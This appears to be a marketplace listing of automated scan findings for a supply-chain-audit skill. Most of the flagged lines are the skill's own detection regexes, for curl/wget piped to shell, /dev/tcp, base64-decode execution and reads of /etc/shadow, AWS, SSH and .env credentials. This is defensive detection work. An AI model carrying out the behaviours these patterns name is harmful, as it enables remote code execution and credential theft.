supply-chain-audit
Conducts multi-language supply chain audits to detect dependency poisoning and enhance security against supply chain attacks.
Install this skill
Security score
The supply-chain-audit skill was audited on May 12, 2026 and we found 71 security issues across 6 threat categories, including 33 high-severity. Review the findings below before installing.
Categories Tested
Security Issues
Direct command execution function call
| 37 | (r'import\s+.*exec\s*\(', 'import + exec(): 动态代码执行'), |
Direct command execution function call
| 887 | (r'\bexec\s*\(', 'HIGH', 'exec(): 动态代码执行'), |
Eval function call - arbitrary code execution
| 38 | (r'import\s+.*eval\s*\(', 'import + eval(): 动态表达式求值'), |
Eval function call - arbitrary code execution
| 231 | (r'eval\s*\(\s*Buffer\.from\s*\(', 'eval(Buffer.from(...)): 编码混淆+执行'), |
Eval function call - arbitrary code execution
| 232 | (r'eval\s*\(\s*atob\s*\(', 'eval(atob(...)): base64解码+执行'), |
Eval function call - arbitrary code execution
| 233 | (r'eval\s*\(\s*require\s*\(', 'eval(require(...)): 动态加载+执行'), |
Eval function call - arbitrary code execution
| 249 | (r'eval\s*\(', 'eval(): 动态代码执行'), |
Eval function call - arbitrary code execution
| 654 | (r'eval\s*\(\s*Base64\.decode64', 'eval(Base64.decode64(...)): 解码执行'), |
Eval function call - arbitrary code execution
| 886 | (r'\beval\s*\(', 'HIGH', 'eval(): 动态代码执行'), |
Eval function call - arbitrary code execution
| 924 | (r'eval\s*\(\s*Buffer\.from\s*\(', 'CRITICAL', 'eval(Buffer.from(...)): 编码混淆+执行'), |
Eval function call - arbitrary code execution
| 925 | (r'eval\s*\(\s*atob\s*\(', 'CRITICAL', 'eval(atob(...)): base64+执行'), |
Piping content to bash shell
| 300 | if any(kw in cmd.lower() for kw in ['curl ','wget ','http://','https://','eval ','base64','powershell','/dev/tcp','|sh','| sh','|bash','| bash']): |
Piping content to bash shell
| 462 | (r'//go:generate\s+(?:curl|wget|sh|bash|python)', '//go:generate 执行危险命令'), |
Piping content to bash shell
| 570 | (r'Command::new\s*\(\s*["\'](?:curl|wget|bash|sh|powershell)', 'build.rs 执行危险命令'), |
Piping content to bash shell
| 651 | (r'system\s*\(\s*["\'](?:curl|wget|bash|sh|powershell)', 'system() 执行危险命令'), |
Piping content to bash shell
| 652 | (r'`(?:curl|wget|bash|sh).*`', '反引号执行危险命令'), |
Piping content to bash shell
| 653 | (r'IO\.popen.*(?:curl|wget|sh|bash)', 'IO.popen 执行危险命令'), |
Piping content to bash shell
| 907 | (r'`[^`]*(?:curl|wget|bash|sh)[^`]*`', 'CRITICAL', '反引号执行危险命令'), |
Piping content to sh shell
| 239 | (r'spawn\s*\(\s*[\'"](?:bash|sh|cmd|powershell)', 'spawn shell: 启动shell进程'), |
Piping content to sh shell
| 300 | if any(kw in cmd.lower() for kw in ['curl ','wget ','http://','https://','eval ','base64','powershell','/dev/tcp','|sh','| sh','|bash','| bash']): |
Piping content to sh shell
| 462 | (r'//go:generate\s+(?:curl|wget|sh|bash|python)', '//go:generate 执行危险命令'), |
Piping content to sh shell
| 570 | (r'Command::new\s*\(\s*["\'](?:curl|wget|bash|sh|powershell)', 'build.rs 执行危险命令'), |
Piping content to sh shell
| 651 | (r'system\s*\(\s*["\'](?:curl|wget|bash|sh|powershell)', 'system() 执行危险命令'), |
Piping content to sh shell
| 652 | (r'`(?:curl|wget|bash|sh).*`', '反引号执行危险命令'), |
Piping content to sh shell
| 653 | (r'IO\.popen.*(?:curl|wget|sh|bash)', 'IO.popen 执行危险命令'), |
Piping content to sh shell
| 881 | (r'curl\s+.*\|\s*(?:bash|sh|zsh|python|perl|ruby)', 'CRITICAL', 'curl pipe to shell: 下载并执行远程脚本'), |
Piping content to sh shell
| 882 | (r'wget\s+.*\|\s*(?:bash|sh|zsh|python|perl|ruby)', 'CRITICAL', 'wget pipe to shell: 下载并执行远程脚本'), |
Piping content to sh shell
| 883 | (r'base64\s+(?:-D|--decode)\s*\|\s*(?:bash|sh|zsh)', 'CRITICAL', 'base64 decode pipe to shell: 混淆后门'), |
Piping content to sh shell
| 884 | (r'\|\s*base64\s+(?:-D|--decode)\s*\|\s*(?:bash|sh|zsh)', 'CRITICAL', 'piped base64 decode+execute'), |
Piping content to sh shell
| 907 | (r'`[^`]*(?:curl|wget|bash|sh)[^`]*`', 'CRITICAL', '反引号执行危险命令'), |
System command execution
| 651 | (r'system\s*\(\s*["\'](?:curl|wget|bash|sh|powershell)', 'system() 执行危险命令'), |
System command execution
| 890 | (r'os\.system\s*\(', 'HIGH', 'os.system(): 不安全的命令执行'), |
System command execution
| 906 | (r'system\s*\(\s*["\']', 'HIGH', 'system(): 命令执行'), |
Node child_process module reference
| 236 | (r'child_process.*exec\s*\(', 'child_process.exec: 执行系统命令'), |
Node child_process module reference
| 237 | (r'require\s*\(\s*[\'"]child_process[\'"]\s*\)', 'require child_process: 导入命令执行模块'), |
Node child_process module reference
| 897 | (r'require\s*\(\s*[\'"]child_process[\'"]\s*\)', 'HIGH', 'require child_process'), |
Node child_process module reference
| 898 | (r'child_process.*exec\s*\(', 'HIGH', 'child_process.exec: 命令执行'), |
Python os.system command execution
| 890 | (r'os\.system\s*\(', 'HIGH', 'os.system(): 不安全的命令执行'), |
Curl to non-GitHub URL
| 300 | if any(kw in cmd.lower() for kw in ['curl ','wget ','http://','https://','eval ','base64','powershell','/dev/tcp','|sh','| sh','|bash','| bash']): |
Wget to non-GitHub URL
| 300 | if any(kw in cmd.lower() for kw in ['curl ','wget ','http://','https://','eval ','base64','powershell','/dev/tcp','|sh','| sh','|bash','| bash']): |
Access to /etc/passwd
| 1003 | (r'/etc/passwd|/etc/shadow', 'CRITICAL', '密码文件访问'), |
Access to /etc/shadow
| 1003 | (r'/etc/passwd|/etc/shadow', 'CRITICAL', '密码文件访问'), |
Access to hidden dotfiles in home directory
| 95 | pyenv_root = os.environ.get('PYENV_ROOT', os.path.expanduser('~/.pyenv')) |
Access to hidden dotfiles in home directory
| 194 | rdir = os.path.expanduser('~/.claude/audit-reports') |
Access to hidden dotfiles in home directory
| 268 | os.path.expanduser('~/.npm-global/lib/node_modules'), |
Access to hidden dotfiles in home directory
| 271 | os.path.expanduser('~/.nvm/versions/node'), |
Access to hidden dotfiles in home directory
| 424 | rdir = os.path.expanduser('~/.claude/audit-reports') |
Access to hidden dotfiles in home directory
| 590 | cargo_home = os.environ.get('CARGO_HOME', os.path.expanduser('~/.cargo')) |
Access to hidden dotfiles in home directory
| 668 | os.path.expanduser('~/.gem/ruby'), os.path.expanduser('~/.rbenv/versions'), |
Access to hidden dotfiles in home directory
| 1194 | rdir = os.path.expanduser('~/.claude/audit-reports') |
Access to hidden dotfiles in home directory
| 1241 | Reports saved to ~/.claude/audit-reports/ |
Access to hidden dotfiles in home directory
| 1256 | - JSON 报告保存在 `~/.claude/audit-reports/supply-chain-{ecosystem}-{timestamp}.json` |
Access to AWS credentials directory
| 965 | (r'open\s*\([^)]*[\'"].*(?:\.aws/credentials|\.aws/config)[\'"]', 'CRITICAL', '读取AWS凭证'), |
Access to .env file
| 92 | for venv_name in ('.venv', 'venv', 'env', '.env'): |
Access to .env file
| 240 | (r'\.readFileSync\s*\(.*(?:\.ssh|\.aws|\.npmrc|\.env|credentials)', '读取敏感凭证文件'), |
Access to .env file
| 241 | (r'process\.env\b.*(?:KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL)', '读取敏感环境变量'), |
Access to .env file
| 573 | (r'fs::read_to_string.*(?:\.ssh|\.aws|credential|\.env)', 'build.rs 读取凭证文件'), |
Access to .env file
| 972 | (r'open\s*\([^)]*[\'"].*\.env[\'"]', 'HIGH', '读取.env文件'), |
Access to .env file
| 981 | (r'\.readFileSync\s*\(.*(?:\.ssh|\.aws|\.npmrc|\.env|credentials)', 'CRITICAL', 'readFileSync读取凭证'), |
Access to .env file
| 982 | (r'process\.env\b.*(?:KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL)', 'HIGH', 'process.env读取敏感变量'), |
Access to system keychain/keyring
| 962 | (r'keyring\.get_password\s*\(', 'MEDIUM', '系统密钥链访问'), |
Base64 decode operation
| 39 | (r'import\s+.*\bbase64\b.*decode', 'import + base64 decode: 编码混淆载荷'), |
Base64 decode operation
| 654 | (r'eval\s*\(\s*Base64\.decode64', 'eval(Base64.decode64(...)): 解码执行'), |
Base64 decode operation
| 847 | if re.search(r'eval\s*\(|base64_decode|exec\s*\(|system\s*\(|passthru|shell_exec|curl_exec', content): |
Base64 decode operation
| 883 | (r'base64\s+(?:-D|--decode)\s*\|\s*(?:bash|sh|zsh)', 'CRITICAL', 'base64 decode pipe to shell: 混淆后门'), |
Base64 decode operation
| 884 | (r'\|\s*base64\s+(?:-D|--decode)\s*\|\s*(?:bash|sh|zsh)', 'CRITICAL', 'piped base64 decode+execute'), |
Base64 decode operation
| 915 | (r'base64\.(?:b64decode|decodebytes)\s*\(', 'MEDIUM', 'base64解码(可能的混淆)'), |
Base64 decode operation
| 1036 | decoded = base64.b64decode(m.group(0)).decode('utf-8', errors='ignore') |
Base64 decode via atob()
| 232 | (r'eval\s*\(\s*atob\s*\(', 'eval(atob(...)): base64解码+执行'), |
Base64 decode via atob()
| 925 | (r'eval\s*\(\s*atob\s*\(', 'CRITICAL', 'eval(atob(...)): base64+执行'), |
External URL reference
| 571 | (r'Command::new.*\.arg.*(?:http://|https://)', 'build.rs 下载远程内容'), |